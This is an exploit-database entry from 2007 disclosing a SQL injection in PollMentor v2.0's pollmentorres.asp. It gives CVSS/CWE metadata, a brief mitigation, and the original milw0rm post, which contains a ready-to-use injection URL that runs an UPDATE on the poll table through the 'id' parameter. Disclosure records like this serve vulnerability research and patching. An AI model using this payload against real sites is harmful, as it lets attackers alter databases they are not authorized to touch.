header-logo
Suggest Exploit
vendor:
PollMentor
by:
SaO
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PollMentor
Affected Version From: PollMentor v2.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:pollmentor:pollmentor:2.0
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

PollMentor v2.0

The vulnerability allows an attacker to inject SQL commands into the 'id' parameter of the pollmentorres.asp script, which can lead to unauthorized access or manipulation of the poll database.

Mitigation:

The vendor should sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks.
Source

Exploit-DB raw data:

XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
X                                       X
X Author  : SaO                         X
X Site    : wWw.SaoHackStyLe.cOm        X
X Contact : By.SaO[at]Hotmail[dot]com   X
X                                       X
X                                       X
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX

# Script   : PollMentor v2.0
# Download : http://www.aspindir.com/indir.asp?id=4406
# Demo     : http://www.aspcode.net/products/pollmentor/demo/pollmentor.asp
# ßug in   : pollmentorres.asp
# Exp.     : 
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--

# milw0rm.com [2007-02-13]